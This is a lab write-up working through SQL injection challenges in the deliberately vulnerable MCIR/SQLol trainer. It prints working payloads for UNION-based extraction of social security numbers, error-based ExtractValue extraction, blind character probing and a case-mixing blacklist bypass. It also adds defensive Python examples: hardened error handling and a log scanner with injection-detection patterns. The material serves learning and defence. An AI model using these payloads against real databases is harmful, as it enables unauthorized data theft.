MCIR Injection Learning Notes

环境: xampp-win32-5.6.3-0-VC11    mcir

Preface

MCIR is also one of the "top ten", yet why does it feel like nobody writes blog posts or other material about it? That makes it genuinely hard, very hard, for a newcomer to learn this system.... My plan was to spend two days studying it and organizing notes. A whole day has already gone by and I am still groping in the dark; comparing the time spent with what I actually got done makes me feel terrible. Ah, the pressure is huge!!!

Eventually I found a video on YouTube, watched some of it, and got a rough feel for things. Video: Riding the Magical Code Injection Rainbow (MCIR) with Daniel Crowley


Preparation

First change the database connection password in the application (if you are using the xampp bundle, just set the password to empty). The setting is in the file

D:\xampp\htdocs\mcir\sqlol\includes\database.config.php

Getting started

After opening the home page, select SQLol to enter it; you will see the following menu:

| INSERT || UPDATE || DELETE || SELECT || Custom || Challenges |

Select Challenges; once inside you will see the following screen:
(screenshot)

We take the challenge levels in order, one at a time.

Challenge 0

This one is simple; it asks for all usernames:

Your objective is to get the query to return all usernames instead of just one.

The hint says the parameter is a string type, so the following statement gets the result directly:

(screenshot)

Of course, besides ' or '1'='1 , we can also use the '=' injection method shown in the official video.

Challenge 1

Challenge 1 asks the following:

Your objective is to find the table of social security numbers present in the database and extract its information.

Now we need to find tables. My approach was as follows:

Use order by to guess the number of columns in the result set: 1
Then get the connected user, the database name and the database version. The statement is:

' and 1=2 union select concat_ws(char(32,58,32),user(),database(),version()) #

The result is: root@localhost : sqlol : 5.6.21

Then we enumerate the tables in sqlol:

' and 1=2 union select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=0x73716C6F6C #

We get two tables: ssn and users

We are asked for social security numbers; looking at the two tables, it should be the ssn table. OK, now get all columns of the ssn table:

' and 1=2 union select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x73736E #

We get two columns: name and ssn

Then dump the values of those columns:

' and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

The information obtained is shown in the screenshot below:

(screenshot)

Challenge 2 - The Failure of Quote Filters

At first glance challenge 2 looks identical to the previous one, so I copied the last statement above straight in. Oops, an error. Reading the challenge description more carefully:

Many people sanitize or remove single quotes in their Web applications to prevent SQL injection attacks. While this can be effective against injection into string parameters, it is ineffective at preventing injection into parameters which are not quote delimited, like integers or datetime values. This places restrictions on how your injection string can be written, but does not present much of an obstacle to an attacker.

After honestly reading through it, I found that the web application filters single quotes. So let's try removing the single quote:

and 1=2 union select concat_ws(char(32,58,32),name , ssn ) from ssn #

The result is as follows:

(screenshot)

Challenge 3 - Death Row

The description of this challenge:

You don't always have the luxury of retrieving all rows of output from a query when performing an SQL injection attack. Sometimes, you only get one row. This challenge is similar to challenge 1, "SQL Injection 101", but only provides one row of output. To make things more challenging, this challenge configuration does not show you the query.

Roughly, the requirement is the same as in challenge 1, but the result is no longer all rows; only one row is returned per query.

For this type we construct statements like the following:

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 #
' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 #
...

Challenge 4 - War on Error

The description:

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT blind SQL injection techniques.

Here the query result is not displayed, so we need to construct a statement that carries the data into the error message. (Error display must be enabled for this.)

Constructed statements:

' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a
' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a
...
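The note above that error display must be enabled is the whole story of this challenge from the defender's side: the query output is hidden, but the database error text is still sent to the client, and error text reflects whatever the engine choked on. The following added example (mine, not SQLol's code) shows the two handler shapes against a constructed sqlite table: one that returns the raw error, so the offending token comes back verbatim, and one that logs the detail server-side and returns a fixed message while binding the parameter.

```python
import logging
import sqlite3

log = logging.getLogger("sqlol-demo")


def make_db():
    """Constructed single-row stand-in for the users table (hypothetical data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT);
        INSERT INTO users VALUES (1, 'alice');
    """)
    return conn


def query_verbose(conn, user_id):
    # Challenge 4 configuration: the raw database error goes back to the client,
    # so the token the engine complains about is echoed in the response.
    sql = "SELECT username FROM users WHERE id = %s" % user_id
    try:
        return {"rows": [r[0] for r in conn.execute(sql)], "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


def query_hardened(conn, user_id):
    # Detail is written to the server log only; the client sees a fixed message.
    # The id is validated and bound instead of being interpolated into the SQL.
    try:
        rows = conn.execute("SELECT username FROM users WHERE id = ?", (int(user_id),))
        return {"rows": [r[0] for r in rows], "error": None}
    except (ValueError, sqlite3.Error) as exc:
        log.error("query failed for id=%r: %s", user_id, exc)
        return {"rows": [], "error": "Request failed."}


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    db = make_db()
    print(query_verbose(db, "1 zzz"))    # error text names the stray token "zzz"
    print(query_hardened(db, "1 zzz"))   # {'rows': [], 'error': 'Request failed.'}
```

In the PHP setup the page uses, the equivalent of the hardened branch is keeping display_errors off in production and writing errors to the log file instead, so that nothing the engine says about a query reaches the browser.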

Challenge 5 - Blind Luck

The description:

You must perform a basic Blind SQL injection attack. Only an indication of whether the query returned results is available.

Here error display is turned off, and we inject blind.

For this kind of injection the result is a boolean, so when constructing the statement we have to build it as a conditional??? And we must use or???

' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 79 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 71 #
' or ascii(substring((select table_name from information_schema.tables limit 1 offset 0),1,1)) >= 67 #

Challenge 6 - Stack the Deck

In this challenge, you must utilize stacked queries due to the difficulty of extraction in the SQLi scenario.

Your objective is to create a new table called "ipwntyourdb" using stacked queries.

Challenge 6 is stacked queries, but PHP does not seem to support them; see this description: SQL: do php+mysql support stacked queries?

And this challenge does not seem to be implemented ----

Challenge 7 - Walking on Thin Ice

In this challenge, no output from the query is shown, but verbose errors are shown.

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

....As for the delete-related injection, I currently do not know how to get there.

Challenge 8 - Black Comedy

You must perform a very basic SQL injection attack, but a primitive blacklisting filter is in place.

Your objective is to find the table of social security numbers present in the database and extract its information.

There is a default blacklist filter, but it can be bypassed. The injection statement is:

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='
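Challenges 5 and 8 show two things a detection rule has to cope with: the blind probe in challenge 5 is a series of near-identical requests that differ only in a compared number, and the challenge 8 payload defeats the built-in blacklist simply by mixing case. The following added example (my own code, not part of MCIR) scans constructed Apache-style access log lines for the request shapes this page uses. It URL-decodes each query string and matches case-insensitively, which is what the primitive blacklist in challenge 8 fails to do. The log lines and rule names are made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access log lines (not from any real server) reproducing the shape
# of the requests from challenges 0, 5 and 8, plus two benign lookups.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:01 +0000] "GET /sqlol/select.php?inject_string=alice HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2015:10:00:02 +0000] "GET /sqlol/select.php?inject_string=%27+or+%271%27%3D%271 HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2015:10:00:03 +0000] "GET /sqlol/select.php?inject_string=%27+or+ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+0),1,1))+%3E%3D+79+%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2015:10:00:04 +0000] "GET /sqlol/select.php?inject_string=%27+uNion+seLect+concat(name,%27:%27,ssn)+from+ssn+whEre+username%3D%27 HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2015:10:00:05 +0000] "GET /sqlol/select.php?inject_string=O%27Brien HTTP/1.1" 200 512
"""

# Hypothetical rule names; each pattern is applied to the decoded query string
# with re.I so that uNion/seLect style case games do not matter.
RULES = {
    "tautology": re.compile(r"'\s*or\s*'?\w+'?\s*=\s*'?\w+", re.I),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "schema_probe": re.compile(r"information_schema", re.I),
    "blind_charcmp": re.compile(r"ascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "error_xpath": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def decoded_query(line):
    """Return the URL-decoded query string of one log line, or '' if none."""
    m = REQUEST_RE.search(line)
    if not m:
        return ""
    return unquote_plus(m.group(1).partition("?")[2])


def scan_log(text):
    """Map 1-based line numbers to the sorted list of rule names that fired."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        q = decoded_query(line)
        fired = sorted(name for name, rx in RULES.items() if rx.search(q))
        if fired:
            hits[lineno] = fired
    return hits


if __name__ == "__main__":
    for lineno, names in scan_log(SAMPLE_LOG).items():
        print(lineno, ", ".join(names))
```

A scan like this is a signal for the SOC, not a substitute for the parameterized queries that actually close the hole; note that the apostrophe in O'Brien on the last line does not fire anything, which is the false-positive case a quote-only rule would get wrong.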

Challenge 9 - Administrative Tasks

In this challenge, you are working with an UPDATE query. The query updates the field "username" in the "users" table for a given user.

Your objective is to inject into the query and cause it to update the "isadmin" field to 1 for the user with id 3.

Not done -----
